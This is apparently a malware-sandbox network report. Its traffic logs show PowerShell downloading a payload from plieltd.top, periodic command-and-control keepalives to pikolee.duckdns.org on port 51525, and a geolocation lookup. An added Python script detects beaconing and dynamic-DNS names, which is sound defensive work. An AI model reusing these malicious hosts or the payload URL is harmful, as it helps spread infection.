                                                                                                  Oct 22, 2024 09:40:46.880479097 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880565882 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880574942 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880606890 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.880760908 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880800962 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880805969 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.880812883 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880848885 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.880923986 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880935907 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880971909 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.881268024 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.881329060 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.881340981 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.881365061 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.881441116 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.881453037 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.881478071 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.901793003 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.901845932 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.901851892 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.901861906 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.901905060 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.901926994 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.901946068 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.901957989 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.901983023 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.942866087 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.942924023 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.942934990 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.942960978 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.942981958 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.942991018 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.943068981 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.943078041 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.943105936 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.990848064 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.990860939 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.990869999 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.990900993 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.990935087 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.996705055 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996716022 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996725082 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996735096 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996750116 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.996778011 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.996908903 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996934891 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996944904 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996968031 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997070074 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997107029 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997163057 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997231960 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997251034 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997267008 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997426033 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997459888 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997591972 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997663975 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997673988 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997684956 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997699976 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997725964 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997823954 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997834921 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997844934 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997854948 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997869015 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997890949 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.998353958 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998393059 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998404026 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998429060 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.998621941 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998631001 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998709917 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.018795967 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018805981 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018815041 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018830061 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018841982 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018852949 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018860102 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.018896103 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.059910059 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.059921026 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.059926987 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.060087919 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.106796026 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.106807947 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.106816053 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.106852055 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.107696056 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.107737064 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.107798100 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.107808113 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.107846022 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.113701105 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113711119 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113719940 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113749027 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.113810062 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113818884 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113828897 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113838911 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113842964 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.113862038 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114141941 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114152908 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114162922 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114171028 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114180088 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114208937 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114501953 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114536047 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114567041 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114576101 CEST5152549892143.244.46.150192.168.2.6
Oct 22, 2024 09:40:47.114614964 CEST | 49892 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:40:47.114818096 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:47.114861012 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:47.114871025 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:47.114892006 CEST | 49892 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:40:47.114917994 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:47.114927053 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:47.114953995 CEST | 49892 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:40:47.168297052 CEST | 49892 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:40:49.279479027 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:49.281456947 CEST | 49881 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:40:49.286798954 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.005728006 CEST | 49892 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:40:50.011163950 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.011178017 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.011188030 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.011286974 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.011296034 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.011306047 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.011346102 CEST | 49892 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:40:50.011364937 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.011373997 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.011383057 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.011431932 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.016726017 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.016791105 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.016799927 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.016819954 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.016844034 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.016879082 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.016887903 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.072010040 CEST | 49892 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:40:50.077802896 CEST | 51525 | 49892 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:40:50.078102112 CEST | 49892 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:41:19.291930914 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:41:19.294698000 CEST | 49881 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:41:19.300246000 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:41:49.324758053 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:41:49.330761909 CEST | 49881 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:41:49.336184025 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:42:19.352750063 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:42:19.354952097 CEST | 49881 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:42:19.360378027 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:42:25.027988911 CEST | 49893 | 80 | 192.168.2.6 | 178.237.33.50
Oct 22, 2024 09:42:25.340442896 CEST | 49893 | 80 | 192.168.2.6 | 178.237.33.50
Oct 22, 2024 09:42:25.949577093 CEST | 49893 | 80 | 192.168.2.6 | 178.237.33.50
Oct 22, 2024 09:42:27.152834892 CEST | 49893 | 80 | 192.168.2.6 | 178.237.33.50
Oct 22, 2024 09:42:29.558979034 CEST | 49893 | 80 | 192.168.2.6 | 178.237.33.50
Oct 22, 2024 09:42:34.371459007 CEST | 49893 | 80 | 192.168.2.6 | 178.237.33.50
Oct 22, 2024 09:42:43.980900049 CEST | 49893 | 80 | 192.168.2.6 | 178.237.33.50
Oct 22, 2024 09:42:49.361079931 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:42:49.364304066 CEST | 49881 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:42:49.369712114 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:43:19.382970095 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:43:19.386347055 CEST | 49881 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:43:19.391947031 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:43:49.385751009 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Oct 22, 2024 09:43:49.387995005 CEST | 49881 | 51525 | 192.168.2.6 | 143.244.46.150
Oct 22, 2024 09:43:49.393651009 CEST | 51525 | 49881 | 143.244.46.150 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 09:40:03.918266058 CEST | 55336 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 09:40:04.105952978 CEST | 53 | 55336 | 1.1.1.1 | 192.168.2.6
Oct 22, 2024 09:40:41.080828905 CEST | 58713 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 09:40:41.198081017 CEST | 53 | 58713 | 1.1.1.1 | 192.168.2.6
Oct 22, 2024 09:40:43.025791883 CEST | 62734 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 09:40:43.035059929 CEST | 53 | 62734 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 22, 2024 09:40:03.918266058 CEST | 192.168.2.6 | 1.1.1.1 | 0x9c5 | Standard query (0) | plieltd.top | A (IP address) | IN (0x0001) | false
Oct 22, 2024 09:40:41.080828905 CEST | 192.168.2.6 | 1.1.1.1 | 0xc925 | Standard query (0) | pikolee.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 09:40:43.025791883 CEST | 192.168.2.6 | 1.1.1.1 | 0x1f71 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 22, 2024 09:40:04.105952978 CEST | 1.1.1.1 | 192.168.2.6 | 0x9c5 | No error (0) | plieltd.top | | 104.21.56.189 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 09:40:04.105952978 CEST | 1.1.1.1 | 192.168.2.6 | 0x9c5 | No error (0) | plieltd.top | | 172.67.155.139 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 09:40:41.198081017 CEST | 1.1.1.1 | 192.168.2.6 | 0xc925 | No error (0) | pikolee.duckdns.org | | 143.244.46.150 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 09:40:43.035059929 CEST | 1.1.1.1 | 192.168.2.6 | 0x1f71 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
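Two things in the tables above are worth turning into a check. The 143.244.46.150:51525 flow (pikolee.duckdns.org, per the DNS answers) repeats the same short exchange at 09:40:49, 09:41:19, 09:41:49, 09:42:19, 09:42:49, 09:43:19 and 09:43:49, i.e. every 30 seconds, which is what a C2 keepalive looks like on the wire. The 49893 -> 178.237.33.50:80 packets between 09:42:25 and 09:42:43, by contrast, are spaced by gaps that roughly double each time, the signature of TCP retransmission backoff rather than a beacon. The following Python is an added example written for this report, not Joe Sandbox code: it runs a simple beacon-interval check and a dynamic-DNS check over rows copied from the packet and DNS tables above. The burst gap, the minimum event count, the coefficient-of-variation threshold and the dynamic-DNS suffix list are assumptions chosen for illustration.

```python
"""Beacon-interval and dynamic-DNS checks over rows copied from this report.
Added example, not Joe Sandbox code; burst gap, event minimum, CV threshold
and the dynamic-DNS suffix list are assumptions chosen for illustration."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# (timestamp, src port, dst port, src IP, dst IP) copied from the TCP table
# above: server-to-victim packets of the 143.244.46.150:51525 keepalives
# (two per exchange) and the victim's retransmissions to 178.237.33.50:80.
PACKETS = [
    ("Oct 22, 2024 09:40:49.279479027 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:40:49.286798954 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:41:19.291930914 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:41:19.300246000 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:41:49.324758053 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:41:49.336184025 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:42:19.352750063 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:42:19.360378027 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:42:49.361079931 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:42:49.369712114 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:43:19.382970095 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:43:19.391947031 CEST", 51525, 49881, "143.244.46.150", "192.168.2.6"),
    ("Oct 22, 2024 09:42:25.027988911 CEST", 49893, 80, "192.168.2.6", "178.237.33.50"),
    ("Oct 22, 2024 09:42:25.340442896 CEST", 49893, 80, "192.168.2.6", "178.237.33.50"),
    ("Oct 22, 2024 09:42:25.949577093 CEST", 49893, 80, "192.168.2.6", "178.237.33.50"),
    ("Oct 22, 2024 09:42:27.152834892 CEST", 49893, 80, "192.168.2.6", "178.237.33.50"),
    ("Oct 22, 2024 09:42:29.558979034 CEST", 49893, 80, "192.168.2.6", "178.237.33.50"),
    ("Oct 22, 2024 09:42:34.371459007 CEST", 49893, 80, "192.168.2.6", "178.237.33.50"),
    ("Oct 22, 2024 09:42:43.980900049 CEST", 49893, 80, "192.168.2.6", "178.237.33.50"),
]

# (name, address) pairs from the DNS answer table above.
DNS_ANSWERS = [
    ("plieltd.top", "104.21.56.189"),
    ("plieltd.top", "172.67.155.139"),
    ("pikolee.duckdns.org", "143.244.46.150"),
    ("geoplugin.net", "178.237.33.50"),
]
# Assumed, deliberately short list of free dynamic-DNS parent domains.
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net", "hopto.org")


def parse_ts(ts):
    """'Oct 22, 2024 09:40:49.279479027 CEST' -> datetime; strptime takes at
    most six fractional digits, so the nanosecond tail is cut off."""
    stamp, _, _zone = ts.rpartition(" ")
    head, _, frac = stamp.partition(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def flow_events(packets, burst_gap=1.0):
    """Group packets by directional (src, sport, dst, dport) and merge packets
    within burst_gap seconds of an event's first packet into that event, so a
    multi-packet keepalive exchange counts once."""
    flows = defaultdict(list)
    for ts, sport, dport, src, dst in packets:
        flows[(src, sport, dst, dport)].append(parse_ts(ts))
    events = {}
    for key, times in flows.items():
        collapsed = [min(times)]
        for t in sorted(times)[1:]:
            if (t - collapsed[-1]).total_seconds() > burst_gap:
                collapsed.append(t)
        events[key] = collapsed
    return events


def interval_stats(times):
    """(mean gap, coefficient of variation) between consecutive events, or
    None when fewer than three gaps exist."""
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 3:
        return None
    m = mean(gaps)
    return m, pstdev(gaps) / m


def find_beacons(packets, min_events=4, max_cv=0.1):
    """Flows whose events recur at a near-constant interval. Exponential
    retransmission backoff (gaps that keep doubling) has a high CV and is
    therefore not reported, even though it has enough events."""
    hits = []
    for key, times in flow_events(packets).items():
        stats = interval_stats(times) if len(times) >= min_events else None
        if stats and stats[1] <= max_cv:
            hits.append((key, round(stats[0], 1), round(stats[1], 4)))
    return hits


def dynamic_dns_hits(answers, suffixes=DYNDNS_SUFFIXES):
    """Resolved names that sit under a dynamic-DNS parent domain."""
    return [(n, a) for n, a in answers
            if any(n == s or n.endswith("." + s) for s in suffixes)]


if __name__ == "__main__":
    for key, interval, cv in find_beacons(PACKETS):
        print(f"periodic flow {key}: every {interval}s (cv={cv})")
    for name, addr in dynamic_dns_hits(DNS_ANSWERS):
        print(f"dynamic-DNS name {name} -> {addr}")
```

Run as-is it reports only the 143.244.46.150:51525 -> 192.168.2.6:49881 flow, at 30.0 s with a coefficient of variation near zero, and pikolee.duckdns.org as the single dynamic-DNS resolution; the retransmission flow towards 178.237.33.50:80 has five events but a coefficient of variation around 0.6 and is dropped. On real traffic the two thresholds need tuning per environment, and the suffix list should come from a maintained source rather than the four entries assumed here.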
                                                                                                  • plieltd.top
                                                                                                  • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49893 | 178.237.33.50 | 80 | 2996 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 09:40:43.041161060 CEST | 71 | OUT | GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Oct 22, 2024 09:40:43.893595934 CEST | 1165 | IN | HTTP/1.1 200 OK
    date: Tue, 22 Oct 2024 07:40:43 GMT
    server: Apache
    content-length: 957
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 33 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
    Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"3ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 104.21.56.189 | 443 | 2912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 07:40:04 UTC | 173 | OUT | GET /Kvalificeredes.qxd HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: plieltd.top
    Connection: Keep-Alive
2024-10-22 07:40:05 UTC | 908 | IN | HTTP/1.1 200 OK
    Date: Tue, 22 Oct 2024 07:40:05 GMT
    Content-Length: 494580
    Connection: close
